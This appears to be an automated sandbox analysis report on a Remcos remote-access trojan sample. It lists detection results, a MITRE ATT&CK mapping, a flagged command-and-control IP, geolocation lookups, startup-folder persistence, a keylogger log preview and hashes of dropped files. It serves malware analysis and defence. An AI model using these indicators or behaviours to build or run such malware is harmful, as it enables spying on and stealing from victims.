Source: Yara match	File source: Process Memory Space: Graff.exe PID: 7792, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Graff.exe PID: 1436, type: MEMORYSTR
Source: Yara match	File source: C:\ProgramData\remcos\logs.dat, type: DROPPED

Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: cmd.exe		2_2_00405042
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: cmd.exe		10_2_00405042

Source: C:\Users\user\AppData\Local\misruling\Graff.exe

Code function: 6_2_0042DE27 RpcBindingCreateW,

6_2_0042DE27

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	111 Scripting	Valid Accounts	21 Native API	111 Scripting	1 DLL Side-Loading	1 Deobfuscate/Decode Files or Information	2 OS Credential Dumping	2 System Time Discovery	Remote Services	11 Archive Collected Data	12 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	12 Command and Scripting Interpreter	1 DLL Side-Loading	1 Bypass User Account Control	21 Obfuscated Files or Information	121 Input Capture	1 Account Discovery	Remote Desktop Protocol	1 Data from Local System	2 Encrypted Channel	Exfiltration Over Bluetooth	1 Defacement
Email Addresses	DNS Server	Domain Accounts	2 Service Execution	1 Windows Service	1 Access Token Manipulation	1 Software Packing	2 Credentials in Registry	1 System Service Discovery	SMB/Windows Admin Shares	1 Email Collection	1 Remote Access Software	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	2 Registry Run Keys / Startup Folder	1 Windows Service	1 DLL Side-Loading	3 Credentials In Files	4 File and Directory Discovery	Distributed Component Object Model	121 Input Capture	2 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	222 Process Injection	1 Bypass User Account Control	LSA Secrets	38 System Information Discovery	SSH	3 Clipboard Data	12 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	2 Registry Run Keys / Startup Folder	1 Masquerading	Cached Domain Credentials	231 Security Software Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	11 Virtualization/Sandbox Evasion	DCSync	11 Virtualization/Sandbox Evasion	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 Access Token Manipulation	Proc Filesystem	4 Process Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	222 Process Injection	/etc/passwd and /etc/shadow	11 Application Window Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	Dynamic API Resolution	Network Sniffing	1 System Owner/User Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
bwYw3UUfy7.exe	72%	Virustotal		Browse
bwYw3UUfy7.exe	71%	ReversingLabs	Win32.Backdoor.Remcos
bwYw3UUfy7.exe	100%	Avira	HEUR/AGEN.1319493
bwYw3UUfy7.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Local\misruling\Graff.exe	100%	Avira	HEUR/AGEN.1319493
C:\Users\user\AppData\Local\misruling\Graff.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\misruling\Graff.exe	71%	ReversingLabs	Win32.Backdoor.Remcos

Source	Detection	Scanner	Label
https://d0682b2d8bbebf21dab46160329925d6.azr.footprintdns.com/apc/trans.gif?8595da0e88f921ab00454191	0%	Avira URL Cloud	safe
https://d0682b2d8bbebf21dab46160329925d6.azr.footprintdns.com/apc/trans.gif?82954a9491e844512441fcdc	0%	Avira URL Cloud	safe
http://www.imvu.coma	0%	Avira URL Cloud	safe
150.26	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
geoplugin.net	178.237.33.50	true	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://geoplugin.net/json.gp	false		high
150.26	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://www.office.com/	bhv4482.tmp.4.dr	false		high
http://www.imvu.comr	Graff.exe, 00000002.00000002.3743546633.00000000073D0000.00000040.10000000.00040000.00000000.sdmp, Graff.exe, 00000007.00000002.1378147317.0000000000400000.00000040.80000000.00040000.00000000.sdmp	false		high
https://aefd.nelreports.net/api/report?cat=bingth	bhv4482.tmp.4.dr	false		high
https://d0682b2d8bbebf21dab46160329925d6.azr.footprintdns.com/apc/trans.gif?8595da0e88f921ab00454191	bhv4482.tmp.4.dr	false	Avira URL Cloud: safe	unknown
http://www.imvu.com	Graff.exe, Graff.exe, 00000007.00000002.1378656184.0000000000BFD000.00000004.00000020.00020000.00000000.sdmp, Graff.exe, 00000007.00000002.1378147317.0000000000400000.00000040.80000000.00040000.00000000.sdmp	false		high
https://aefd.nelreports.net/api/report?cat=wsb	bhv4482.tmp.4.dr	false		high
http://www.imvu.coma	Graff.exe, 00000007.00000002.1378656184.0000000000BFD000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.nirsoft.net	Graff.exe, 00000004.00000002.1397336446.00000000011F4000.00000004.00000010.00020000.00000000.sdmp	false		high
https://aefd.nelreports.net/api/report?cat=bingaotak	bhv4482.tmp.4.dr	false		high
https://deff.nelreports.net/api/report?cat=msn	bhv4482.tmp.4.dr	false		high
http://geoplugin.net/json.gpsystem32	Graff.exe, 00000002.00000003.1396844709.00000000014B1000.00000004.00000020.00020000.00000000.sdmp, Graff.exe, 00000002.00000002.3741371682.00000000014B1000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com	Graff.exe, 00000002.00000002.3743546633.00000000073D0000.00000040.10000000.00040000.00000000.sdmp, Graff.exe, 00000007.00000002.1378147317.0000000000400000.00000040.80000000.00040000.00000000.sdmp	false		high
https://www.google.com	Graff.exe, Graff.exe, 00000007.00000002.1378147317.0000000000400000.00000040.80000000.00040000.00000000.sdmp	false		high
https://ecs.nel.measure.office.net?TenantId=Skype&DestinationEndpoint=Edge-Prod-LAX31r5b&FrontEnd=AF	bhv4482.tmp.4.dr	false		high
https://M365CDN.nel.measure.office.net/api/report?FrontEnd=AkamaiCDNWorldWide&DestinationEndpoint=EL	bhv4482.tmp.4.dr	false		high
http://geoplugin.net/	Graff.exe, 00000002.00000002.3740170778.0000000001436000.00000004.00000020.00020000.00000000.sdmp, Graff.exe, 00000002.00000003.1373773703.0000000001437000.00000004.00000020.00020000.00000000.sdmp, Graff.exe, 00000002.00000003.1396844709.00000000014B1000.00000004.00000020.00020000.00000000.sdmp, Graff.exe, 00000002.00000003.1397495573.0000000001436000.00000004.00000020.00020000.00000000.sdmp, Graff.exe, 00000002.00000003.1397075214.0000000001436000.00000004.00000020.00020000.00000000.sdmp, Graff.exe, 00000002.00000003.1371817413.0000000001420000.00000004.00000020.00020000.00000000.sdmp, Graff.exe, 00000002.00000002.3741371682.00000000014B1000.00000004.00000020.00020000.00000000.sdmp	false		high
https://aefd.nelreports.net/api/report?cat=bingaot	bhv4482.tmp.4.dr	false		high
http://geoplugin.net/json.gp/C	Graff.exe, 00000002.00000002.3742130594.0000000003BF0000.00000004.00001000.00020000.00000000.sdmp, Graff.exe, 00000002.00000002.3737382076.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Graff.exe, 0000000A.00000002.1512305298.0000000004010000.00000004.00001000.00020000.00000000.sdmp, Graff.exe, 0000000A.00000002.1511116716.0000000000400000.00000040.00001000.00020000.00000000.sdmp	false		high
https://maps.windows.com/windows-app-web-link	bhv4482.tmp.4.dr	false		high
https://d0682b2d8bbebf21dab46160329925d6.azr.footprintdns.com/apc/trans.gif?82954a9491e844512441fcdc	bhv4482.tmp.4.dr	false	Avira URL Cloud: safe	unknown
https://aefd.nelreports.net/api/report?cat=bingrms	bhv4482.tmp.4.dr	false		high
https://www.google.com/accounts/servicelogin	Graff.exe	false		high
https://login.yahoo.com/config/login	Graff.exe	false		high
http://www.nirsoft.net/	Graff.exe, 00000007.00000002.1378147317.0000000000400000.00000040.80000000.00040000.00000000.sdmp	false		high
http://www.ebuddy.com	Graff.exe, Graff.exe, 00000007.00000002.1378147317.0000000000400000.00000040.80000000.00040000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
192.210.150.26	unknown	United States		36352	AS-COLOCROSSINGUS	true
178.237.33.50	geoplugin.net	Netherlands		8455	ATOM86-ASATOM86NL	false

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1587911
Start date and time:	2025-01-10 19:16:41 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 10m 7s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	14
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	bwYw3UUfy7.exe renamed because original name is a hash value
Original Sample Name:	0d9239013e7f6fab8aab618ce46b5225d0283da9f81d937cae7a3988a127f879.exe
Detection:	MAL
Classification:	mal100.rans.phis.troj.spyw.expl.evad.winEXE@14/10@1/2
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 84% Number of executed functions: 104 Number of non-executed functions: 295
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded IPs from analysis (whitelisted): 13.107.246.45, 4.245.163.56, 52.149.20.212
Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.

Simulations

Behavior and APIs

Time	Type	Description
13:18:13	API Interceptor	5957475x Sleep call for process: Graff.exe modified
19:17:44	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Graff.vbs

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
192.210.150.26	FACTURA.xlsx	Get hash	malicious	Remcos	Browse
	7056ZCiFdE.exe	Get hash	malicious	Remcos	Browse
	uIarPolvHR.exe	Get hash	malicious	Remcos	Browse
	IB9876789000.bat.exe	Get hash	malicious	Remcos	Browse
	z49FACTURA-0987678.exe	Get hash	malicious	Remcos	Browse
	FAT6789098700900.scr.exe	Get hash	malicious	Remcos	Browse
	Rgh99876k7e.exe	Get hash	malicious	Remcos	Browse
	SALKI098765R400.exe	Get hash	malicious	Remcos	Browse
	FTE98767800000.bat.exe	Get hash	malicious	Remcos	Browse
178.237.33.50	1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe	Get hash	malicious	Remcos	Browse	geoplugin.net/json.gp
	Material Requirments.pif.exe	Get hash	malicious	Remcos, PureLog Stealer	Browse	geoplugin.net/json.gp
	preliminary drawing.pif.exe	Get hash	malicious	Remcos, PureLog Stealer	Browse	geoplugin.net/json.gp
	DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe	Get hash	malicious	Remcos	Browse	geoplugin.net/json.gp
	z58Swiftcopy_MT.bat.exe	Get hash	malicious	Remcos, GuLoader	Browse	geoplugin.net/json.gp
	173634822473cd620521fcc8b42a4aac25bbd1c3f6e30c324045b1411f9747e93f432d0281839.dat-decoded.exe	Get hash	malicious	Remcos	Browse	geoplugin.net/json.gp
	1736348224ad77cf86e491faad27e4b5decf1eb0bb26f16b0527e5ef488389ba353aa3db79582.dat-decoded.exe	Get hash	malicious	Remcos	Browse	geoplugin.net/json.gp
	17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe	Get hash	malicious	Remcos	Browse	geoplugin.net/json.gp
	1736348224f7603a5c535b2b2f6cc29730626d73a967c67551d2d14f73b547fe7b5fc10393994.dat-decoded.exe	Get hash	malicious	Remcos	Browse	geoplugin.net/json.gp
	1736348224bd83df4c8d79407f8e7ac5cf8c08b59746ce37ff95772daa0a6283b50e2b0882115.dat-decoded.exe	Get hash	malicious	Remcos	Browse	geoplugin.net/json.gp

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
geoplugin.net	1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe	Get hash	malicious	Remcos	Browse	178.237.33.50
	Material Requirments.pif.exe	Get hash	malicious	Remcos, PureLog Stealer	Browse	178.237.33.50
	preliminary drawing.pif.exe	Get hash	malicious	Remcos, PureLog Stealer	Browse	178.237.33.50
	DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe	Get hash	malicious	Remcos	Browse	178.237.33.50
	z58Swiftcopy_MT.bat.exe	Get hash	malicious	Remcos, GuLoader	Browse	178.237.33.50
	173634822473cd620521fcc8b42a4aac25bbd1c3f6e30c324045b1411f9747e93f432d0281839.dat-decoded.exe	Get hash	malicious	Remcos	Browse	178.237.33.50
	1736348224ad77cf86e491faad27e4b5decf1eb0bb26f16b0527e5ef488389ba353aa3db79582.dat-decoded.exe	Get hash	malicious	Remcos	Browse	178.237.33.50
	17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe	Get hash	malicious	Remcos	Browse	178.237.33.50
	1736348224f7603a5c535b2b2f6cc29730626d73a967c67551d2d14f73b547fe7b5fc10393994.dat-decoded.exe	Get hash	malicious	Remcos	Browse	178.237.33.50
	1736348224bd83df4c8d79407f8e7ac5cf8c08b59746ce37ff95772daa0a6283b50e2b0882115.dat-decoded.exe	Get hash	malicious	Remcos	Browse	178.237.33.50

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
AS-COLOCROSSINGUS	Nuevo-orden.xla.xlsx	Get hash	malicious	Unknown	Browse	192.3.27.144
	Nuevo-orden.xla.xlsx	Get hash	malicious	Unknown	Browse	192.3.27.144
	Nuevo-orden.xla.xlsx	Get hash	malicious	Unknown	Browse	192.3.27.144
	sh4.elf	Get hash	malicious	Mirai	Browse	23.95.117.229
	sweetnessgoodforgreatnessthingswithgood.tIF.vbs	Get hash	malicious	SmokeLoader	Browse	192.3.27.144
	begoodforeverythinggreatthingsformebetterforgood.hta	Get hash	malicious	Cobalt Strike, SmokeLoader	Browse	192.3.27.144
	PO#3311-20250108003.xls	Get hash	malicious	Unknown	Browse	192.3.27.144
	PO#3311-20250108003.xls	Get hash	malicious	Unknown	Browse	192.3.27.144
	PO#3311-20250108003.xls	Get hash	malicious	Unknown	Browse	192.3.27.144
	miori.ppc.elf	Get hash	malicious	Unknown	Browse	192.210.142.114
ATOM86-ASATOM86NL	1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe	Get hash	malicious	Remcos	Browse	178.237.33.50
	Material Requirments.pif.exe	Get hash	malicious	Remcos, PureLog Stealer	Browse	178.237.33.50
	preliminary drawing.pif.exe	Get hash	malicious	Remcos, PureLog Stealer	Browse	178.237.33.50
	DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe	Get hash	malicious	Remcos	Browse	178.237.33.50
	z58Swiftcopy_MT.bat.exe	Get hash	malicious	Remcos, GuLoader	Browse	178.237.33.50
	173634822473cd620521fcc8b42a4aac25bbd1c3f6e30c324045b1411f9747e93f432d0281839.dat-decoded.exe	Get hash	malicious	Remcos	Browse	178.237.33.50
	1736348224ad77cf86e491faad27e4b5decf1eb0bb26f16b0527e5ef488389ba353aa3db79582.dat-decoded.exe	Get hash	malicious	Remcos	Browse	178.237.33.50
	17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe	Get hash	malicious	Remcos	Browse	178.237.33.50
	1736348224f7603a5c535b2b2f6cc29730626d73a967c67551d2d14f73b547fe7b5fc10393994.dat-decoded.exe	Get hash	malicious	Remcos	Browse	178.237.33.50
	1736348224bd83df4c8d79407f8e7ac5cf8c08b59746ce37ff95772daa0a6283b50e2b0882115.dat-decoded.exe	Get hash	malicious	Remcos	Browse	178.237.33.50

Process:	C:\Users\user\AppData\Local\misruling\Graff.exe
File Type:	data
Category:	dropped
Size (bytes):	292
Entropy (8bit):	3.424765532656324
Encrypted:	false
SSDEEP:	6:Mls6UlWM65YcIeeDAlOWA41gWA7DxbN2fxlPGnm0v:t6UlNKec0WIWItN2LPGnl
MD5:	B18D13E8153A49F50BFE9B527A77BF29
SHA1:	4AF6572A5A97B1B3B0E115B8D7E4F4063A4983DA
SHA-256:	97A8E1B9F89BC22F2DB9E238B4513EE77E2020BBFC42DF74E8029C3B0768D391
SHA-512:	11FA561999F43E7A576B574F04B7CB11F0D89BFD7CBAB23ADB12178015DF619E4687AFC7CAF017EBEE369E381F41EF609808B3B24FD40DAFCC6119A1B56338A4
Malicious:	true
Yara Hits:	Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\ProgramData\remcos\logs.dat, Author: Joe Security
Reputation:	low
Preview:	....[.2.0.2.5./.0.1./.1.0. .1.3.:.1.7.:.4.1. .O.f.f.l.i.n.e. .K.e.y.l.o.g.g.e.r. .S.t.a.r.t.e.d.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].........[.R.u.n.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].........{. .U.s.e.r. .h.a.s. .b.e.e.n. .i.d.l.e. .f.o.r. .7.0.5.2.5. .m.i.n.u.t.e.s. .}.....

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q8X2NUFH\json[1].json

Download File

Process:	C:\Users\user\AppData\Local\misruling\Graff.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	963
Entropy (8bit):	5.019506780280991
Encrypted:	false
SSDEEP:	12:tkluWJmnd6CsGkMyGWKyGXPVGArwY307f7aZHI7GZArpv/mOAaNO+ao9W7iN5zzd:qlupdRNuKyGX85jvXhNlT3/7AcV9Wro
MD5:	7459F6DA71CD5EAF9DBE2D20CA9434AC
SHA1:	4F60E33E15277F7A632D8CD058EC7DF4728B40BC
SHA-256:	364A445C3A222EE10A8816F78283BBD0503A5E5824B2A7F5DCD8E6DA9148AF6A
SHA-512:	3A862711D78F6F97F07E01ACC0DCB54F595A23AACEA9F2BB9606382805E1E92C1ACE09E1446F312F3B6D4EE63435ABEF46F0C16F015BD505347A1BCF2E149841
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	{. "geoplugin_request":"8.46.123.189",. "geoplugin_status":200,. "geoplugin_delay":"1ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"New York",. "geoplugin_region":"New York",. "geoplugin_regionCode":"NY",. "geoplugin_regionName":"New York",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"501",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"40.7123",. "geoplugin_longitude":"-74.0068",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/New_York",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}

C:\Users\user\AppData\Local\Temp\aut2C95.tmp

Download File

Process:	C:\Users\user\Desktop\bwYw3UUfy7.exe
File Type:	data
Category:	dropped
Size (bytes):	414120
Entropy (8bit):	7.982849625243517
Encrypted:	false
SSDEEP:	6144:YVd5ROfqQ8cYLiFoCpzCnP6d1iWgqOiZdk6OVrxHtP42KCb0goIXhjm9A:YVfKqQ8qTFE6d1DgB79xb0uBm9A
MD5:	3C6EE36CB897BA9651CAA319D175C099
SHA1:	64581E446BA5CB91B30E7C498BF56E09C6059BFF
SHA-256:	ADAD26344BAE088FD07486C0E39DCEFA09C3EE980E3D209C40B48C6B030D836F
SHA-512:	90AD70DBA89254C1B62220FA0AD21758C86DBBF934BA5AE579B394F0983D4BC9A5EEC6D8D545326DFEB56F343BAA538D2D27F0562C3FC32AF42606EFBAC5A2BB
Malicious:	false
Reputation:	low
Preview:	EA06......{.:.&.2.Q...~..J..u......&.J%....0...B.S.uJ..yV.S01.e......R..JM4.J.SYM.I/..$...Ge.QgVI.........Ab..i....../F"9.....o.....6N?....P....r....s.........QM..=..Z........l-9>'B........x.......$7+... ..\|/...............K!...../......._..-.K..@...KQh.2a.....^..\..%.O.V.....E.D.....L.U.......@.T...iG.L4JX.]J.U.Gq..S.u...S..N%.^.. ..V.0...b....v..I.....d......D.}..$.....+.i...5t.<.c. ....&.............c;..+.9.R.Z..'T. ......,G...\.^..q.)I.&aT..x.z..?...C.)<.Z..I.@.."eV....J......R.....w,..:.@..T.XD...E.....Q.....C&.Khu.M.......K......<\|p.....?....nWZ...B.U%..\....Y.5h...H...Z.%2.I...P:...\|.....:...o.T.d.y..@.....2..e....I.......+..i!U.%_....:{...E....O.....h`p..[..Dh.+]..Z.c1v.......Ty6.m......52...0...@.U.......[.8.K2..p...z..zI,e..X...n...-..e^.-.W@.....i.U..[....Z).9.nEw.k....R;..s...N..X.Qd.......Y+4......-.. ..\|..-....AG.....k.i..+.9L>....iT.^W.u..-.ZH....Zd..T....B@GIu..t...GH...u.K..:&..@..2..N...E..H......-.ZP..;.Zk..V.u3..&r..

C:\Users\user\AppData\Local\Temp\aut38BB.tmp

Download File

Process:	C:\Users\user\AppData\Local\misruling\Graff.exe
File Type:	data
Category:	dropped
Size (bytes):	414120
Entropy (8bit):	7.982849625243517
Encrypted:	false
SSDEEP:	6144:YVd5ROfqQ8cYLiFoCpzCnP6d1iWgqOiZdk6OVrxHtP42KCb0goIXhjm9A:YVfKqQ8qTFE6d1DgB79xb0uBm9A
MD5:	3C6EE36CB897BA9651CAA319D175C099
SHA1:	64581E446BA5CB91B30E7C498BF56E09C6059BFF
SHA-256:	ADAD26344BAE088FD07486C0E39DCEFA09C3EE980E3D209C40B48C6B030D836F
SHA-512:	90AD70DBA89254C1B62220FA0AD21758C86DBBF934BA5AE579B394F0983D4BC9A5EEC6D8D545326DFEB56F343BAA538D2D27F0562C3FC32AF42606EFBAC5A2BB
Malicious:	false
Reputation:	low
Preview:	EA06......{.:.&.2.Q...~..J..u......&.J%....0...B.S.uJ..yV.S01.e......R..JM4.J.SYM.I/..$...Ge.QgVI.........Ab..i....../F"9.....o.....6N?....P....r....s.........QM..=..Z........l-9>'B........x.......$7+... ..\|/...............K!...../......._..-.K..@...KQh.2a.....^..\..%.O.V.....E.D.....L.U.......@.T...iG.L4JX.]J.U.Gq..S.u...S..N%.^.. ..V.0...b....v..I.....d......D.}..$.....+.i...5t.<.c. ....&.............c;..+.9.R.Z..'T. ......,G...\.^..q.)I.&aT..x.z..?...C.)<.Z..I.@.."eV....J......R.....w,..:.@..T.XD...E.....Q.....C&.Khu.M.......K......<\|p.....?....nWZ...B.U%..\....Y.5h...H...Z.%2.I...P:...\|.....:...o.T.d.y..@.....2..e....I.......+..i!U.%_....:{...E....O.....h`p..[..Dh.+]..Z.c1v.......Ty6.m......52...0...@.U.......[.8.K2..p...z..zI,e..X...n...-..e^.-.W@.....i.U..[....Z).9.nEw.k....R;..s...N..X.Qd.......Y+4......-.. ..\|..-....AG.....k.i..+.9L>....iT.^W.u..-.ZH....Zd..T....B@GIu..t...GH...u.K..:&..@..2..N...E..H......-.ZP..;.Zk..V.u3..&r..

C:\Users\user\AppData\Local\Temp\aut7612.tmp

Download File

Process:	C:\Users\user\AppData\Local\misruling\Graff.exe
File Type:	data
Category:	dropped
Size (bytes):	414120
Entropy (8bit):	7.982849625243517
Encrypted:	false
SSDEEP:	6144:YVd5ROfqQ8cYLiFoCpzCnP6d1iWgqOiZdk6OVrxHtP42KCb0goIXhjm9A:YVfKqQ8qTFE6d1DgB79xb0uBm9A
MD5:	3C6EE36CB897BA9651CAA319D175C099
SHA1:	64581E446BA5CB91B30E7C498BF56E09C6059BFF
SHA-256:	ADAD26344BAE088FD07486C0E39DCEFA09C3EE980E3D209C40B48C6B030D836F
SHA-512:	90AD70DBA89254C1B62220FA0AD21758C86DBBF934BA5AE579B394F0983D4BC9A5EEC6D8D545326DFEB56F343BAA538D2D27F0562C3FC32AF42606EFBAC5A2BB
Malicious:	false
Reputation:	low
Preview:	EA06......{.:.&.2.Q...~..J..u......&.J%....0...B.S.uJ..yV.S01.e......R..JM4.J.SYM.I/..$...Ge.QgVI.........Ab..i....../F"9.....o.....6N?....P....r....s.........QM..=..Z........l-9>'B........x.......$7+... ..\|/...............K!...../......._..-.K..@...KQh.2a.....^..\..%.O.V.....E.D.....L.U.......@.T...iG.L4JX.]J.U.Gq..S.u...S..N%.^.. ..V.0...b....v..I.....d......D.}..$.....+.i...5t.<.c. ....&.............c;..+.9.R.Z..'T. ......,G...\.^..q.)I.&aT..x.z..?...C.)<.Z..I.@.."eV....J......R.....w,..:.@..T.XD...E.....Q.....C&.Khu.M.......K......<\|p.....?....nWZ...B.U%..\....Y.5h...H...Z.%2.I...P:...\|.....:...o.T.d.y..@.....2..e....I.......+..i!U.%_....:{...E....O.....h`p..[..Dh.+]..Z.c1v.......Ty6.m......52...0...@.U.......[.8.K2..p...z..zI,e..X...n...-..e^.-.W@.....i.U..[....Z).9.nEw.k....R;..s...N..X.Qd.......Y+4......-.. ..\|..-....AG.....k.i..+.9L>....iT.^W.u..-.ZH....Zd..T....B@GIu..t...GH...u.K..:&..@..2..N...E..H......-.ZP..;.Zk..V.u3..&r..

C:\Users\user\AppData\Local\Temp\bhv4482.tmp

Download File

Process:	C:\Users\user\AppData\Local\misruling\Graff.exe
File Type:	Extensible storage engine DataBase, version 0x620, checksum 0x47d2f92e, page size 32768, DirtyShutdown, Windows version 10.0
Category:	dropped
Size (bytes):	18874368
Entropy (8bit):	0.828931272672626
Encrypted:	false
SSDEEP:	6144:AA/kqb7hP0u1fM1iM15Sd+qk5J/p1CUNL5NCAMPqpXqp5qpkQFeX+SQFFqpDvoQa:LD88+zewCevKKNb+EsUq3
MD5:	2B6755C3B6202DB51102DF3BA0F0664A
SHA1:	6776B41FE6BADCAD402FF5C9B7246DBA1B51D713
SHA-256:	EF45C7DFF9A3EB32E7CC8F61102B310818D72838B269333900D34722EF1AA185
SHA-512:	2C5254A69C7D3A77E7FBB444E69AF876AAA1A081FABA50A3C63625F6DFB8D8D9E8B30F552D1F87B1427BAC8F07A7D668355CDA2B0CBF3C381AE74030B333B111
Malicious:	false
Preview:	G...... ....................1...{........................v..........{......}E.h.x..............................1...{..............................................................................................d...........eJ......n........................................................................................................... ............{..............................................................................................................................................................................................3....{..........................................}E4....................*....}E..........................#......h.x.....................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\dews

Download File

Process:	C:\Users\user\Desktop\bwYw3UUfy7.exe
File Type:	data
Category:	dropped
Size (bytes):	492544
Entropy (8bit):	7.634812006074578
Encrypted:	false
SSDEEP:	12288:whSgky/zxI36FJxnGnNdLnD4ee5Q90122iTFCj/YKs/ERw:aTUqXcNdLD4e+yeiTX
MD5:	DC5A9959D2CEA2EE2BCA9F5C0C114CAB
SHA1:	6E7C122D8A6A16C36E8F27D29D0DE0A07651FCDB
SHA-256:	5787DF4931839F750020EE47850BFED8F345212A3AD1722F9BFD5FBD04FE1D81
SHA-512:	F196ED4901770E0CE36395B99438E46A137D856269CAD57E783D951C287FFA5D5268C73B42333D8D86D6128A1EB4426E2C14B5D49CCC58EA47DE59895D44D6DD
Malicious:	false
